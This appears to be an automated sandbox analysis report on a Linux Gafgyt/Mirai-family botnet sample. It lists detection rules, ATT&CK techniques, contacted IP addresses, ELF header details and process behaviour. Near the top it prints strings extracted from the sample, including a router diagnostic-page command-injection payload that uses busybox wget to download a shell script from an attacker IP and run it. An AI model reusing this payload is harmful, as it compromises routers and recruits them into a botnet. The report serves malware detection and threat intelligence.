      Source: Process Memory Space: enYTIDNSNe.elf PID: 6213, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://141.98.10.82/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://141.98.10.82/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0141.98.10.82
      Source: classification engineClassification label: mal80.troj.linELF@0/0@0/0

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57818
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39000
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57824
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57830
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39008
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57836
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57840
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57844
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58190
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58194
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39018
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58196
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59062
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39800
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59068
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59076
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40250
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40902
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59720
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40916
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60114
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60118
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41296
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39892
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41302
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41304
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41310
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41312
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41320
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41402
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41408
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41414
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41416
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41420
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41428
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41430
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41434
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41438
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41440
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41444
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41448
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41450
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41498
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41508
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41510
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41516
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41526
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41530
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41540
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41548
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41552
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41570
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 41576
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42030
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42050
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42410
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42420
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42434
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42446
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 42804
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43968
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43976
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43978
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44006
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44016
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44020
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44030
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44044
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44052
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44068
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44092
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44100
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44112
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44120
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 44130

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: enYTIDNSNe.elf, type: SAMPLE
      Source: Yara matchFile source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: enYTIDNSNe.elf PID: 6207, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: enYTIDNSNe.elf PID: 6208, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: enYTIDNSNe.elf PID: 6213, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: enYTIDNSNe.elf, type: SAMPLE
      Source: Yara matchFile source: 6207.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6213.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6208.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: enYTIDNSNe.elf PID: 6207, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: enYTIDNSNe.elf PID: 6208, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: enYTIDNSNe.elf PID: 6213, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
      Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
      Non-Standard Port
      SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
      Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Non-Application Layer Protocol
      Data Encrypted for ImpactDNS ServerEmail Addresses
      Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication2
      Application Layer Protocol
      Data DestructionVirtual Private ServerEmployee Names
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1341483 Sample: enYTIDNSNe.elf Startdate: 13/11/2023 Architecture: LINUX Score: 80 22 24.35.22.109 WOW-INTERNETUS United States 2->22 24 178.139.81.169 VODAFONE_ESES Spain 2->24 26 98 other IPs or domains 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Antivirus / Scanner detection for submitted sample 2->30 32 Multi AV Scanner detection for submitted file 2->32 34 3 other signatures 2->34 8 enYTIDNSNe.elf 2->8         started        signatures3 process4 process5 10 enYTIDNSNe.elf 8->10         started        12 enYTIDNSNe.elf 8->12         started        process6 14 enYTIDNSNe.elf 10->14         started        16 enYTIDNSNe.elf 10->16         started        18 enYTIDNSNe.elf 10->18         started        20 enYTIDNSNe.elf 10->20         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      enYTIDNSNe.elf66%ReversingLabsLinux.Trojan.Mirai
      enYTIDNSNe.elf67%VirustotalBrowse
      enYTIDNSNe.elf100%AviraEXP/ELF.Gafgyt.Gen.D
      enYTIDNSNe.elf100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://141.98.10.82/bins/Rakitin.shenYTIDNSNe.elffalse
        unknown
        http://141.98.10.82/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114enYTIDNSNe.elffalse
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          170.43.8.207
          unknownUnited States
          264957CoopercitrusCooperativadeProdutoresRuraisBRfalse
          178.198.75.95
          unknownSwitzerland
          3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
          94.8.166.143
          unknownUnited Kingdom
          5607BSKYB-BROADBAND-ASGBfalse
          145.158.225.1
          unknownNetherlands
          1103SURFNET-NLSURFnetTheNetherlandsNLfalse
          90.41.8.20
          unknownFrance
          3215FranceTelecom-OrangeFRfalse
          23.151.3.221
          unknownReserved
          33561GREENHOUSE-WYUSfalse
          213.224.55.80
          unknownBelgium
          6848TELENET-ASBEfalse
          170.238.180.200
          unknownBrazil
          266331GlobalNetInformaticaLtdaBRfalse
          203.207.123.79
          unknownChina
          17964DXTNETBeijingDian-Xin-TongNetworkTechnologiesCoLtdfalse
          170.145.146.228
          unknownUnited States
          2048LANET-1USfalse
          118.94.183.226
          unknownIndia
          9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
          212.167.164.234
          unknownEuropean Union
          51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
          213.167.30.188
          unknownBulgaria
          28909BG-TVSAT-ASBGfalse
          170.26.92.130
          unknownUnited States
          23410NET-NASSAU-BOCESUSfalse
          119.2.4.245
          unknownChina
          23724CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporationfalse
          79.82.239.244
          unknownFrance
          15557LDCOMNETFRfalse
          36.240.238.105
          unknownJapan37903EMOBILEYmobileCorporationJPfalse
          119.23.55.43
          unknownChina
          37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
          178.95.206.212
          unknownUkraine
          6849UKRTELNETUAfalse
          181.59.4.7
          unknownColombia
          10620TelmexColombiaSACOfalse
          182.60.194.193
          unknownIndia
          17813MTNL-APMahanagarTelephoneNigamLimitedINfalse
          170.190.208.108
          unknownUnited States
          33527MGN-2USfalse
          178.71.171.215
          unknownRussian Federation
          12389ROSTELECOM-ASRUfalse
          181.47.141.63
          unknownArgentina
          27747TelecentroSAARfalse
          146.239.92.93
          unknownUnited States
          2018TENET-1ZAfalse
          119.196.11.32
          unknownKorea Republic of
          4766KIXS-AS-KRKoreaTelecomKRfalse
          75.184.18.20
          unknownUnited States
          11426TWC-11426-CAROLINASUSfalse
          79.5.50.244
          unknownItaly
          3269ASN-IBSNAZITfalse
          89.151.126.201
          unknownUnited Kingdom
          24931DEDIPOWERGBfalse
          84.229.162.157
          unknownIsrael
          9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystefalse
          213.223.177.60
          unknownFrance
          8228CEGETEL-ASFRfalse
          37.160.127.188
          unknownFrance
          51207FREEMFRfalse
          181.26.83.244
          unknownArgentina
          22927TelefonicadeArgentinaARfalse
          213.31.2.190
          unknownBelgium
          6871PLUSNETUKInternetServiceProviderGBfalse
          94.66.233.225
          unknownGreece
          6799OTENET-GRAthens-GreeceGRfalse
          38.172.65.246
          unknownUnited States
          174COGENT-174USfalse
          62.131.13.127
          unknownNetherlands
          1136KPNKPNNationalEUfalse
          119.238.60.149
          unknownJapan2518BIGLOBEBIGLOBEIncJPfalse
          119.169.248.141
          unknownJapan9824JTCL-JP-ASJupiterTelecommunicationCoLtdJPfalse
          191.47.176.234
          unknownBrazil
          7738TelemarNorteLesteSABRfalse
          179.59.217.104
          unknownBolivia
          28024NuevatelPCSdeBoliviaSABOfalse
          125.149.218.12
          unknownKorea Republic of
          4766KIXS-AS-KRKoreaTelecomKRfalse
          170.148.227.226
          unknownUnited States
          38481JPMORGAN-TRANSIT-AS-SG-APJPMORGANSingaporeSGfalse
          178.139.81.169
          unknownSpain
          12430VODAFONE_ESESfalse
          178.132.250.162
          unknownSweden
          45011SE-A3httpwwwa3seSEfalse
          178.114.204.63
          unknownAustria
          8437UTA-ASATfalse
          129.206.24.151
          unknownGermany
          553BELWUEBelWue-KoordinationEUfalse
          118.160.244.99
          unknownTaiwan; Republic of China (ROC)
          3462HINETDataCommunicationBusinessGroupTWfalse
          178.129.91.46
          unknownRussian Federation
          28812JSCBIS-ASRUfalse
          62.156.228.146
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          119.47.10.44
          unknownJapan55385DADigitalAllianceCoLtdJPfalse
          171.145.133.64
          unknownUnited States
          9874STARHUB-MOBILEStarHubLtdSGfalse
          86.249.34.85
          unknownFrance
          3215FranceTelecom-OrangeFRfalse
          145.51.224.227
          unknownNetherlands
          1103SURFNET-NLSURFnetTheNetherlandsNLfalse
          179.8.44.150
          unknownChile
          7418TELEFONICACHILESACLfalse
          79.37.106.140
          unknownItaly
          3269ASN-IBSNAZITfalse
          109.248.243.44
          unknownRussian Federation
          197577KOMTELECOM-ASRUfalse
          135.138.183.41
          unknownUnited States
          14962NCR-252USfalse
          170.10.219.169
          unknownUnited States
          63399DIALPADUSfalse
          109.48.129.160
          unknownPortugal
          2860NOS_COMUNICACOESPTfalse
          72.124.179.155
          unknownUnited States
          22394CELLCOUSfalse
          2.223.201.82
          unknownUnited Kingdom
          5607BSKYB-BROADBAND-ASGBfalse
          213.180.97.137
          unknownLatvia
          20910BALTKOM-ASLVfalse
          42.66.153.29
          unknownTaiwan; Republic of China (ROC)
          17421EMOME-NETMobileBusinessGroupTWfalse
          46.196.21.85
          unknownTurkey
          47524TURKSAT-ASTRfalse
          210.232.162.171
          unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
          178.154.71.32
          unknownBelarus
          44087BEST-ASBYfalse
          108.2.102.237
          unknownUnited States
          701UUNETUSfalse
          62.213.110.45
          unknownRussian Federation
          25227ASN-AVANTEL-MSKLocatedinMoscowRussiaRUfalse
          34.85.103.103
          unknownUnited States
          15169GOOGLEUSfalse
          148.216.187.46
          unknownMexico
          13999MegaCableSAdeCVMXfalse
          213.235.199.100
          unknownAustria
          8437UTA-ASATfalse
          119.196.11.10
          unknownKorea Republic of
          4766KIXS-AS-KRKoreaTelecomKRfalse
          84.229.8.118
          unknownIsrael
          9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystefalse
          198.91.192.43
          unknownCanada
          11814DISTRIBUTEL-AS11814CAfalse
          181.222.227.120
          unknownBrazil
          28573CLAROSABRfalse
          109.67.199.166
          unknownIsrael
          8551BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneILfalse
          159.210.217.179
          unknownItaly
          131090CAT-IDC-4BYTENET-AS-APCATTELECOMPublicCompanyLtdCATTfalse
          68.62.136.165
          unknownUnited States
          7922COMCAST-7922USfalse
          213.3.4.186
          unknownSwitzerland
          3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
          178.142.133.19
          unknownGermany
          9145EWETELCloppenburgerStrasse310DEfalse
          213.37.228.47
          unknownSpain
          12357COMUNITELSPAINESfalse
          181.182.25.163
          unknownVenezuela
          262210VIETTELPERUSACPEfalse
          8.19.45.164
          unknownUnited States
          40393CROSSLINKNETWORKSUSfalse
          187.119.72.41
          unknownBrazil
          26599TELEFONICABRASILSABRfalse
          170.96.119.122
          unknownUnited States
          18980PEACEHEALTHUSfalse
          178.252.201.61
          unknownRussian Federation
          24689ROSINTEL-ASRUfalse
          24.35.22.109
          unknownUnited States
          12083WOW-INTERNETUSfalse
          178.45.195.233
          unknownRussian Federation
          12389ROSTELECOM-ASRUfalse
          119.182.3.195
          unknownChina
          4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
          79.155.35.13
          unknownSpain
          3352TELEFONICA_DE_ESPANAESfalse
          119.179.27.241
          unknownChina
          4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
          181.205.208.50
          unknownColombia
          27831ColombiaMovilCOfalse
          213.91.232.234
          unknownBulgaria
          8866BTC-ASBULGARIABGfalse
          65.128.80.235
          unknownUnited States
          209CENTURYLINK-US-LEGACY-QWESTUSfalse
          101.91.135.122
          unknownChina
          4812CHINANET-SH-APChinaTelecomGroupCNfalse
          212.33.206.110
          unknownIran (ISLAMIC Republic Of)
          43754ASIATECHIRfalse
          181.232.94.168
          unknownColombia
          27695EDATELSAESPCOfalse
          37.202.175.21
          unknownIran (ISLAMIC Republic Of)
          31549RASANAIRfalse
          178.184.52.142
          unknownRussian Federation
          12389ROSTELECOM-ASRUfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          178.198.75.95I46tBvFqsYGet hashmaliciousMiraiBrowse
            94.8.166.143HetFJEY4fk.elfGet hashmaliciousMiraiBrowse
              W47rLMtUVo.elfGet hashmaliciousMiraiBrowse
                90.41.8.20uvqf3mG6CE.elfGet hashmaliciousUnknownBrowse
                  213.167.30.188dFfaflLgJi.elfGet hashmaliciousMiraiBrowse
                    170.26.92.130a3laDbqx3HGet hashmaliciousMiraiBrowse
                      119.2.4.245cfgpPJdQWmGet hashmaliciousGafgyt, MiraiBrowse
                        170.238.180.200SRl4y7ZNr0.elfGet hashmaliciousMiraiBrowse
                          119.23.55.43ITCE07zEH3Get hashmaliciousMiraiBrowse
                            118.94.183.226armGet hashmaliciousMiraiBrowse
                              178.95.206.212jew.x86Get hashmaliciousMiraiBrowse
                                TPbt74lx6JGet hashmaliciousMiraiBrowse
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CoopercitrusCooperativadeProdutoresRuraisBRoBtxppgLWB.elfGet hashmaliciousMiraiBrowse
                                  • 170.36.34.113
                                  1oPKLB5wk5.elfGet hashmaliciousMiraiBrowse
                                  • 170.40.43.234
                                  wQb9yR6USY.elfGet hashmaliciousMiraiBrowse
                                  • 170.0.2.231
                                  eOIFF58KfU.elfGet hashmaliciousUnknownBrowse
                                  • 170.45.134.16
                                  xd.arm.elfGet hashmaliciousMiraiBrowse
                                  • 170.44.127.12
                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                  • 170.44.133.235
                                  FseQ36lw3F.elfGet hashmaliciousUnknownBrowse
                                  • 170.35.176.233
                                  9bmNDy0CjS.elfGet hashmaliciousMiraiBrowse
                                  • 170.34.57.7
                                  x86.elfGet hashmaliciousMiraiBrowse
                                  • 170.42.129.212
                                  9KBPv7C5H4.elfGet hashmaliciousMiraiBrowse
                                  • 170.40.43.200
                                  rh6Ue7txh7.elfGet hashmaliciousUnknownBrowse
                                  • 170.41.70.142
                                  TfHnzbLY7y.elfGet hashmaliciousMiraiBrowse
                                  • 170.37.72.48
                                  eeHcRU4OrS.elfGet hashmaliciousMiraiBrowse
                                  • 170.45.109.87
                                  bXvLuXVSVC.elfGet hashmaliciousMiraiBrowse
                                  • 170.37.84.41
                                  sora.x86.elfGet hashmaliciousMiraiBrowse
                                  • 170.45.183.11
                                  uxtS9aJwEv.elfGet hashmaliciousMiraiBrowse
                                  • 170.37.84.46
                                  xfzak0pHUR.elfGet hashmaliciousMiraiBrowse
                                  • 170.37.47.45
                                  zjnArc1G1S.elfGet hashmaliciousMiraiBrowse
                                  • 170.45.158.36
                                  U7cP8E9xR3.elfGet hashmaliciousMiraiBrowse
                                  • 170.42.217.217
                                  m29dKG8rhc.elfGet hashmaliciousMiraiBrowse
                                  • 170.43.75.191
                                  BSKYB-BROADBAND-ASGBLf7tF1qhnU.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 188.222.71.132
                                  arm7.elfGet hashmaliciousMiraiBrowse
                                  • 90.220.239.213
                                  skid.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 5.67.167.14
                                  skid.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 90.214.117.24
                                  1oPKLB5wk5.elfGet hashmaliciousMiraiBrowse
                                  • 94.11.230.127
                                  Tt4pJQMhy8.elfGet hashmaliciousMiraiBrowse
                                  • 94.6.4.163
                                  5tuUOk0hKz.elfGet hashmaliciousMiraiBrowse
                                  • 94.194.150.74
                                  FVShYxZJpc.elfGet hashmaliciousMiraiBrowse
                                  • 94.194.198.187
                                  9Irkmiibym.elfGet hashmaliciousMiraiBrowse
                                  • 94.9.133.18
                                  QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                  • 94.8.166.141
                                  h7TOIMgvTM.elfGet hashmaliciousMiraiBrowse
                                  • 94.13.20.73
                                  0bHPV0WJr8.elfGet hashmaliciousMiraiBrowse
                                  • 94.9.108.42
                                  ku1uI8KKoV.elfGet hashmaliciousUnknownBrowse
                                  • 94.13.127.234
                                  n7BHnNF4CF.elfGet hashmaliciousMiraiBrowse
                                  • 90.216.155.71
                                  xxhFiiKSKy.elfGet hashmaliciousMiraiBrowse
                                  • 90.221.106.32
                                  z8kSnLJt9Y.elfGet hashmaliciousMiraiBrowse
                                  • 5.70.237.233
                                  LFkxJbWFam.elfGet hashmaliciousMiraiBrowse
                                  • 90.219.13.231
                                  M7b6XThK4o.elfGet hashmaliciousMiraiBrowse
                                  • 151.226.23.60
                                  gbDZzW8qUI.elfGet hashmaliciousMiraiBrowse
                                  • 90.220.239.228
                                  sKYHgS34Gd.elfGet hashmaliciousMiraiBrowse
                                  • 151.228.76.247
                                  SWISSCOMSwisscomSwitzerlandLtdCHskid.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 178.194.177.49
                                  skid.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 164.244.5.106
                                  sgr0elsN2Z.elfGet hashmaliciousMiraiBrowse
                                  • 178.198.75.41
                                  pitNTFQSoH.elfGet hashmaliciousMiraiBrowse
                                  • 213.3.4.146
                                  YqnGcYyIFN.elfGet hashmaliciousMiraiBrowse
                                  • 178.195.108.164
                                  J4oa31mXHl.elfGet hashmaliciousMiraiBrowse
                                  • 213.200.224.22
                                  wQb9yR6USY.elfGet hashmaliciousMiraiBrowse
                                  • 178.197.159.195
                                  5tuUOk0hKz.elfGet hashmaliciousMiraiBrowse
                                  • 85.4.129.180
                                  h7TOIMgvTM.elfGet hashmaliciousMiraiBrowse
                                  • 85.4.81.45
                                  0bHPV0WJr8.elfGet hashmaliciousMiraiBrowse
                                  • 85.0.181.69
                                  7pmemg0WCP.elfGet hashmaliciousUnknownBrowse
                                  • 92.107.3.14
                                  kuru.arm7.elfGet hashmaliciousUnknownBrowse
                                  • 188.60.119.31
                                  arm5-20231108-0341.elfGet hashmaliciousUnknownBrowse
                                  • 46.245.149.99
                                  xxhFiiKSKy.elfGet hashmaliciousMiraiBrowse
                                  • 178.197.62.143
                                  arm5-20231106-0405.elfGet hashmaliciousUnknownBrowse
                                  • 104.66.174.68
                                  Kb3RZ8k5pZ.elfGet hashmaliciousMiraiBrowse
                                  • 83.77.237.254
                                  pbl0DZaV58.elfGet hashmaliciousOkiruBrowse
                                  • 164.242.134.203
                                  1u31ptQsf6.elfGet hashmaliciousOkiruBrowse
                                  • 178.192.115.25
                                  bHFZDHNHZw.elfGet hashmaliciousMiraiBrowse
                                  • 92.107.151.222
                                  pcXpJqSmzM.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 145.250.150.73
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                  Entropy (8bit):6.537752071363973
                                  TrID:
                                  • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                  • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                  File name:enYTIDNSNe.elf
                                  File size:71'888 bytes
                                  MD5:c172d31c71333fd63839e629a6dabf2b
                                  SHA1:8598b2bef303f8336fb210cea25a13ac2c807912
                                  SHA256:7c7290bcd96b542e211208c8799118b9bb352278ba990a029e29646d713a74ae
                                  SHA512:aeb6a7e92da7bca4bf99a121851e11aceb4bc3e61773c0ad4fea6b8be4112bd9adfb485392661c7e2eaaf711fd7475c3e06f35f06f69d85a28bf3de23e8392ac
                                  SSDEEP:1536:3ySSvTK0C1vxhc3TJIxz/OCTTkjZXYdnlkk+K6t5dF5jUJ:CTKZ1vrc3TJIxz/OCTTkjZXql6rPpU
                                  TLSH:EC6349C0A583E8F1DC211939307FAB72AE77E43E2465AAD7E3995B32AB41702910735C
                                  File Content Preview:.ELF....................d...4...@.......4. ...(.....................................................................Q.td............................U..S.......{$...h....#...[]...$.............U......=.....t..5....D......D.......u........t....h............

                                  ELF header

                                  Class:ELF32
                                  Data:2's complement, little endian
                                  Version:1 (current)
                                  Machine:Intel 80386
                                  Version Number:0x1
                                  Type:EXEC (Executable file)
                                  OS/ABI:UNIX - System V
                                  ABI Version:0
                                  Entry Point Address:0x8048164
                                  Flags:0x0
                                  ELF Header Size:52
                                  Program Header Offset:52
                                  Program Header Size:32
                                  Number of Program Headers:3
                                  Section Header Offset:71488
                                  Section Header Size:40
                                  Number of Section Headers:10
                                  Header String Table Index:9
                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                  NULL0x00x00x00x00x0000
                                  .initPROGBITS0x80480940x940x1c0x00x6AX001
                                  .textPROGBITS0x80480b00xb00xf7460x00x6AX0016
                                  .finiPROGBITS0x80577f60xf7f60x170x00x6AX001
                                  .rodataPROGBITS0x80578200xf8200x1ce00x00x2A0032
                                  .ctorsPROGBITS0x805a5040x115040x80x00x3WA004
                                  .dtorsPROGBITS0x805a50c0x1150c0x80x00x3WA004
                                  .dataPROGBITS0x805a5400x115400x1c00x00x3WA0032
                                  .bssNOBITS0x805a7000x117000x8e00x00x3WA0032
                                  .shstrtabSTRTAB0x00x117000x3e0x00x0001
                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                  LOAD0x00x80480000x80480000x115000x115006.56300x5R E0x1000.init .text .fini .rodata
                                  LOAD0x115040x805a5040x805a5040x1fc0xadc3.54270x6RW 0x1000.ctors .dtors .data .bss
                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                  Report size exceeds maximum size, please checkout the PCAP download to see all network behavior

                                  System Behavior

                                  Start time (UTC):05:42:59
                                  Start date (UTC):13/11/2023
                                  Path:/tmp/enYTIDNSNe.elf
                                  Arguments:/tmp/enYTIDNSNe.elf
                                  File size:71888 bytes
                                  MD5 hash:c172d31c71333fd63839e629a6dabf2b

                                  Start time (UTC):05:42:59
                                  Start date (UTC):13/11/2023
                                  Path:/tmp/enYTIDNSNe.elf
                                  Arguments:-
                                  File size:71888 bytes
                                  MD5 hash:c172d31c71333fd63839e629a6dabf2b

                                  Start time (UTC):05:42:59
                                  Start date (UTC):13/11/2023
                                  Path:/tmp/enYTIDNSNe.elf
                                  Arguments:-
                                  File size:71888 bytes
                                  MD5 hash:c172d31c71333fd63839e629a6dabf2b

                                  Start time (UTC):05:42:59
                                  Start date (UTC):13/11/2023
                                  Path:/tmp/enYTIDNSNe.elf
                                  Arguments:-
                                  File size:71888 bytes
                                  MD5 hash:c172d31c71333fd63839e629a6dabf2b
                                  Start time (UTC):05:42:59
                                  Start date (UTC):13/11/2023
